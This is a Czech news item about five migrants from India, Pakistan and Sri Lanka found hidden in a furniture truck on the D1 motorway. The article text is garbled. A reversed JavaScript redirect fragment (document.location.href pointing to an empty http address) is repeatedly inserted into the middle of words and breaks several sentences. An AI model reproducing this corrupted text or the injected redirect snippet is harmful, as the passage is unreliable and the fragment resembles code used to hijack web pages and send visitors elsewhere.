Rainbow page separator

Indové, Pákistánec a Srílančan se do návěsu prořezali střechou

Středa, 29. června 2022

Vysočina / Podezřelé zvuky uslyšel z nitra kamionu převážejícího nábytek zahraniční řidič, který zastavil ve středu 22. června ve dvě hodiny v noci na odpočívadle na 96. kilometru dálnice D1 ve směru na Prahu. Prostřednictvím telefonátu obsluhy benzinového čerpadla na mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to dorazili dálniční policisté z Velkého Beranova a hlídka cizinecké policie. Ti zjistili, že navěs je řádně zaplombovaný, načež je vystřídali celníci, kteří po otevření návěsu, jenž byl prakticky až do stropu naložený nábytkem, objevili pětici migrantů bez jakýchkoliv dokladů [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tožnosti. Ti se dovnitř dostali poté, co rozřezali plachtu ve stropní části návěsu, přičemž pak otvory přelepili.
„Prověřením v příslušných databázích policisté zjistili, že se jedná o tři státní příslušníky Indie, jednoho státního příslušníka Pákistánu a jednoho státního příslušníka státu Srí Lanka. Muži byli ve věku od dvaceti do sedmačtyřiceti let. Všichni údajně nas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupili do návěsu kamionu na území Rumunska a chtěli se v úkrytu dostat do Francie nebo Itálie,“ informovala policejní mluvčí Dana Čírtková.
Nelegální migranti byli s pomocí tlumočníka vyslechnuti, aby s nimi bylo zahájeno správní řízení ve věci jejich vyhoštění z území České republiky; zatím byli převezeni do zařízení pro zajištěné cizince v Balkové.